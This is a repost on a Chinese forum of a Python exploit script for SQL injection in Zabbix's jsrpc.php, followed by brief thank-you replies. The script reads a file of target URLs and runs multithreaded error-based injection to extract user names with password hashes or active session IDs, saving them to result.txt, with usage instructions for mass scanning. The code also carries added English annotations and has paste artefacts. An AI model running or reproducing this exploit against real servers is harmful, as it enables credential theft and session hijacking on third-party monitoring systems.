[转载] zabbix的jsrpc.php注入py利用脚本

Posted 2016-8-22 10:56:58
  1. #coding=utf-8
  2. import Queue
  3. import threading
  4. import re
  5. import requests
  6. import time
  7. import argparse
  8. import urlparse
# Serialises the worker threads' writes to the shared result file ``f``
# (opened in ``__main__``); getpass/getsession take it around their f.write calls.
lock = threading.Lock()


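class WorkManager(object):
    """Load the target list, queue one job per URL and start the worker pool.

    ``filepath`` names a text file with one base URL per line; ``action`` is
    ``'password'`` or ``'session'`` and selects the module-level job function
    (``getpass`` / ``getsession``) applied to every URL; ``thread_num`` ``Work``
    threads are created (each starts itself) and share ``work_queue``.

    Raises ``ValueError`` for an unknown ``action``; ``open`` errors for an
    unreadable ``filepath`` propagate unchanged.
    """

    def __init__(self, filepath, action, thread_num):
        self.work_queue = Queue.Queue()
        self.threads = []
        all_urls = self.all_target_url(filepath)
        # Fill the queue before any thread exists: Work exits on an empty queue.
        self.init_work_queue(all_urls, action)
        self.init_thread_pool(thread_num)

    def init_work_queue(self, all_urls, action):
        """Put a ``(job, url)`` pair on the queue for every URL.

        The job is resolved here, at call time, because ``getpass`` and
        ``getsession`` are defined later in the module.
        """
        if action == 'password':
            job = getpass
        elif action == 'session':
            job = getsession
        else:
            # Previously an unknown action left the queue silently empty and the
            # program finished as if it had run.
            raise ValueError("unknown action %r (expected 'password' or 'session')"
                             % (action,))
        for url in all_urls:
            self.work_queue.put((job, url))

    def init_thread_pool(self, thread_num):
        """Create ``thread_num`` workers; each ``Work`` starts itself in ``__init__``."""
        self.threads.extend(Work(self.work_queue) for _ in range(thread_num))

    def wait_allcomplete(self):
        """Block until every worker thread has finished."""
        for worker in self.threads:
            # is_alive() exists on Python 2.6+ and 3.x; isAlive() was removed in 3.9.
            if worker.is_alive():
                worker.join()

    def all_target_url(self, filepath):
        """Return the stripped, non-empty lines of ``filepath`` as a list.

        Blank lines are dropped so they do not turn into empty target URLs.
        """
        # ``with`` closes the handle even if reading fails; the old code leaked it.
        with open(filepath) as handle:
            return [line.strip() for line in handle if line.strip()]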


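class Work(threading.Thread):
    """Worker thread that drains a shared queue of ``(job, arg)`` pairs.

    The queue is filled before the workers are created, so an empty queue
    means there is no more work and the thread exits.  A job that raises does
    not stop the worker: the error is reported, the item is still marked done
    (so ``Queue.join`` cannot hang on it) and the next item is taken.  The
    thread starts itself in ``__init__``.
    """

    def __init__(self, work_queue):
        threading.Thread.__init__(self)
        self.work_queue = work_queue
        self.start()

    def run(self):
        """Pop and run jobs until the queue is empty."""
        while True:
            try:
                job, arg = self.work_queue.get(block=False)
            except Queue.Empty:
                break
            try:
                job(arg)
            except Exception as exc:
                # The old bare ``except: break`` silently ended the worker on
                # the first failing job and never called task_done() for it.
                print('job failed for %r: %s' % (arg, exc))
            finally:
                self.work_queue.task_done()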

def getpass(url,num=5):
    """Fetch up to ``num`` ``alias:passwd`` rows from one Zabbix host via jsrpc.php.

    ``url`` is the base URL of the target; ``num`` caps the number of rows
    asked for (one request per row).  Each row is read out of the MySQL
    "Duplicate entry" error text that the server echoes in the response.
    The rows are appended to the module-global file ``f`` (opened in
    ``__main__``) under ``lock``.  Nothing is returned; the first request or
    parse failure ends the loop early.
    """
    results=[]

    for x in range(0,num):
        try:
            # Error-based SQL injection in the profileIdx2 parameter; the
            # result row is carried in a duplicate-key error.  The '×tamp'
            # fragment is kept byte-for-byte as posted; it is presumably a
            # rendering artefact of the page.
            payload = '/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2 and (select 1 from (select count(*),concat(floor(rand(0)*2), (select concat(alias,0x3a,passwd) from zabbix.users limit %s,1))x from information_schema.character_sets group by x)y) &updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=showlatest&filter=&filter_task=&mark_color=1'%str(x)
            # ``url`` is rebound every iteration, so each later request is
            # sent to the already-extended URL rather than to the base one.
            url=url+payload
            text=requests.get(url).content
            # The leading '1' is the rand() prefix; the capture is alias:passwd.
            pat = re.compile(r"\[Duplicate entry '1(.+?)'", re.S)
            result = re.findall(pat, text)[0]   # IndexError when nothing matched
            results.append(result)

        except Exception, e:
            # Any network, parse or no-match error stops this host.
            break
    print urlparse.urlparse(url).netloc + 'Done!!\n'
    # Several Work threads share ``f``; keep each host's block contiguous.
    lock.acquire()
    f.write('%s\n'%urlparse.urlparse(url).netloc)
    for x in results:
        f.write('%s\n'%x)
    f.write('\n\n')
    lock.release()


def getsession(url,num=5):
    """Fetch up to ``num`` ``sessionid`` values from one Zabbix host via jsrpc.php.

    Same flow as ``getpass``: one request per row against ``url``, the value is
    read out of the echoed MySQL "Duplicate entry" text (here wrapped in ``~~``
    markers), and the results go to the module-global file ``f`` under
    ``lock``.  Nothing is returned; the first failure ends the loop early.
    """
    results=[]
    for x in range(0, num):
        try:
            # Backslash-continued literal: the leading whitespace of the
            # continuation lines is part of the string.  The '×tamp' fragment
            # is kept byte-for-byte as posted (presumably a page-rendering
            # artefact).
            payload = '/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&\
    hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2 and (select 2333 from (select count(*),concat(floor\
        (rand(0)*2), (select concat(0x7e,0x7e,sessionid,0x7e,0x7e) from sessions limit %s,1))x from information_schema.character_sets \
group by x)y) &updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids[23297]=23297&action=\
showlatest&filter=&filter_task=&mark_color=1'  % str(x)
            # ``url`` is rebound every iteration, so each later request is
            # sent to the already-extended URL rather than to the base one.
            url = url + payload
            text = requests.get(url).content
            # 0x7e is '~': the session id sits between the '~~' markers.
            pat = re.compile(r"\[Duplicate entry '1~~(.*?)~~", re.S)
            result = re.findall(pat, text)[0]   # IndexError when nothing matched
            results.append(result)
        except Exception, e:
            # Any network, parse or no-match error stops this host.
            break

    print urlparse.urlparse(url).netloc + 'Done!!\n'
    # Several Work threads share ``f``; keep each host's block contiguous.
    lock.acquire()
    f.write('%s\n' % urlparse.urlparse(url).netloc)
    for x in results:
        f.write('%s\n' % x)
    f.write('\n\n')
    lock.release()


if __name__ == '__main__':
    # CLI entry point.  --file: text file with one base URL per line;
    # --action: 'password' or 'session'; --threads: worker count (default 10).
    logo = '''\n
     _____     _     _     _      _____           _
    |__  /__ _| |__ | |__ (_)_  _|  ___|   _  ___| | __
      / // _` | '_ \| '_ \| \ \/ / |_ | | | |/ __| |/ /
     / /| (_| | |_) | |_) | |>  <|  _|| |_| | (__|   <
    /____\__,_|_.__/|_.__/|_/_/\_\_|   \__,_|\___|_|\_\

    \n  **************coded by Faith4444 2016-8-19*****************
    '''
    print logo
    start = time.time()
    parser = argparse.ArgumentParser(description = 'Zabbix Sql Injection')
    # Neither option is marked required, so a missing one arrives as None.
    parser.add_argument('--action', action = 'store', dest = 'action')
    parser.add_argument('--file', action = 'store', dest = 'file')
    parser.add_argument('--threads', action='store', dest='threads',default="10",type=int)
    given_args = parser.parse_args()
    action = given_args.action
    filepath = given_args.file
    thread_num = given_args.threads
    # Module-global output file written by getpass/getsession under ``lock``.
    f=open('result.txt','w')
    # The constructor queues the jobs and starts the threads; wait for them.
    work_manager = WorkManager(filepath,action,thread_num)
    work_manager.wait_allcomplete()
    end = time.time()
    f.close()
    print "time:%s"%(end-start)

    # Usage notes (translation of the string below): get sessions (5 rows by
    # default): exp.py --file=urls.txt --action=session; get passwords (5 rows
    # by default): exp.py --file=urls.txt --action=password; custom thread
    # count (default 10): ... --action=password --threads 20; results are
    # written to result.txt in the current directory.
    # NOTE(review): as rendered here the string sits deeper than the ``if``
    # body; this looks like a paste/transcription artefact of the page.
        '''
        获取session(默认取5条)          exp.py --file=urls.txt --action=session
获取password(默认取5条)      exp.py --file=urls.txt --action=password
自定义线程(默认10)                    exp.py --file=urls.txt --action=password  --threads 20
j结果会保存在当前目录下的result.txt里面
        '''
  122.        


流弊的小白 The user has been deleted
Posted 2016-8-23 04:08:46 | Show all replies
么么哒         
liaohaohao123 The user has been deleted
Posted 2016-8-26 14:31:51 | Show all replies

么么哒   
么么哒   
冷尊 The user has been deleted
Posted 2016-8-26 23:23:33 | Show all replies
么么哒
Posted 2016-8-27 10:47:54 | Show all replies
么么哒
zxcvbnm The user has been deleted
Posted 2016-8-29 10:03:08 | Show all replies
么么哒哒哒